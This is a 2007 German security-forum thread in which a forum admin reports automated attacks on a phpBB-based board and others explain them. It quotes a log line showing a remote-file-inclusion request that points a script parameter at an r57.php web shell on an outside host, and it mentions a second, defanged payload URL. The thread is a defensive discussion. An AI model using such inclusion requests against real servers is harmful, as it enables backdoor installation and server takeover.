| Webmaster-Security Fragen zur richtigen Serverkonfiguration oder Absicherung dynamischer Scripte gehören hier hinein. |
Diskussion: Angriffe auf unser Forum Opensky.cc im Forum Webmaster-Security, in der Kategorie Security Area; Anzeige Unser Forum wird angegriffen, gestern 21 mal innert 4 Std. Grund der Angriffe ist vermutlich, dass wir uns mit ...
![]() |
| | #1 (permalink) |
| Registriert seit: 29.12.06 ![]() Likes: 0 | Anzeige Unser Forum wird angegriffen, gestern 21 mal innert 4 Std. Grund der Angriffe ist vermutlich, dass wir uns mit Spammerbanden angelegt haben. Unsere Foren-Software: ORION based on phpBB Beispiel eines Logeintrags von Caracker/Tracker: 16.06.2007, 00:15 /kb.php?sid=///includes/ kb_constants.php?module_root_path=http://secretagent.by.ru/r57.php?? libwww-perl/5.803 211.133.240.90 Auf http://secretagent.by.ru/r57.php?? liegt der Schaedling Backdoor BDS/PHP.Rst.F.3 (Avira) ACHTUNG: Der Infektionsversuch findet ohne eigene Aktion des Besuchers statt, der Aufruf der Seite genuegt! Wir dokumentieren nun saemtliche Angriffe unter http://forum.opensky.cc/viewtopic.php?t=93 Wir achten auf sichere Scripts und regelmaessige Updates. Unsere techn. Administratorin scheint die Situation bisher gut im Griff zu haben. Ich muss aber gestehen, dass ich von der Materie nichts verstehe. Frage: Was koennen wir gegen die Angreifer unternehmen? Herzlichen Dank zum Voraus peter/admin opensky.cc |
| | |
| | #2 (permalink) | |
| Administrator ![]() Registriert seit: 02.10.01 ![]() ![]() Likes: 30 | Das sind einfach automatisierte Scripts die da ablaufen, wo pauschal nach Lücken gesucht wird um diese auszunutzen. Wenn da nicht gerade ein Bug in dieser Richtung im phpbb existiert, habt ihr nichts zu befürchten. Zitat:
Du müsstest mal das Log vom Habo sehen. ![]() Edit: Ich verschieb dich mal ins Webmaster-Security
__________________ RL sux big time... auch 2012! Deleting pr0n is like killing your best friend [HaBo] bei Facebook - Werde Fan | |
| | |
| HaBOT | - Anzeige - |
| |
| | #3 (permalink) |
| Themenstarter Registriert seit: 29.12.06 ![]() Likes: 0 | Danke Mackz, das ist doch beruhigend. Wachsam bleiben wir aber auf jeden Fall! Grss Peter |
| | |
| | #4 (permalink) | |
| Zitat:
ausgeführt werden,allerdings stimmt deine Aussage das es Besucher infiziert afaik nicht. mfg, Xalon | ||
| | |
| | #5 (permalink) | ||
| Guest Likes: | Zitat:
Es geht praktisch darum, dass, wenn man aufm Server solch ein Virenprogramm laufen hat, dass diese Datei eben als Schädling erkannt wird, was soweit ja auch korrekt ist. | ||
|
| | #6 (permalink) | |
| Themenstarter Registriert seit: 29.12.06 ![]() Likes: 0 | Zitat:
Danke fuer die Infos und schoenes Wochenende! peter/opensky.cc | |
| | |
| | #7 (permalink) |
| Registriert seit: 18.06.07 ![]() Likes: 0 | Evtl. mach es Sinn einen sicheren Browser zu verwenden (Firefox ist gute wahr). Somit sind viele XSS Attachen nicht mehr möglich. |
| | |
| | #8 (permalink) |
| Registriert seit: 10.04.07 ![]() Likes: 0 | Naja. Im Themenbereich Sicherheit ist Firefox wohl ein eher ungenügendes Beispiel... (http://mywebpages.comcast.net/Suppor....html#Security) Grüße |
| | |
| | #9 (permalink) | |||
| Moderator ![]() Registriert seit: 30.09.06 ![]() ![]() ![]() ![]() ![]() ![]() Likes: 443 | Zitat:
Zitat:
Zitat:
__________________ Mein Blog - Mein Job - Diaspora Der Ring uns zu knechten besteht aus 12 Sternen auf blauem Grund. Neue Beiträge im Habo via Twitter - Das HaBo auf FB - Das HaBo bei G+ | |||
| | |
| | #10 (permalink) |
| Themenstarter Registriert seit: 29.12.06 ![]() Likes: 0 | Kann mir einer sagen, was das script auf fogender URL ausfuehren soll - die Uebernahme des Servers? h**p://lott.by/d? Hab den Link mit Sternchen entschaerft Danke und Gruss, Peter |
| | |
| | #11 (permalink) | |
| Senior Member | Zitat:
![]() kannst ja mal den irc server joinen^^ //hab noch im code ne email addy gefunden kannst ja reinschreiben^^ tipp zum besser lesen quelltxt anzeigen lassen
__________________ cu Chakky we are dreaming in digital we are living in realtime we are thinking in binary we are talking in IP welcome to our world | |
| | |
![]() |
| - Anzeige - | |
| |
| Themen-Optionen | |
| Ansicht | |
| |
Ähnliche Themen | ||||
| Thema | Autor | Forum | Antworten | Letzter Beitrag |
| Angriffe auf unser Forum Opensky.cc | opensky.cc | Off topic-Zone | 2 | 16.06.07 12:40 |
| Unser Hoohead? | ThiEfGaRReT | Off topic-Zone | 3 | 20.09.06 23:49 |
| Angriffe? | bo2k | (In)security allgemein | 12 | 02.03.04 21:35 |
| "Mysteriöse" Angriffe auf IIS | Rushjo | News & Ankündigungen | 1 | 08.09.02 15:37 |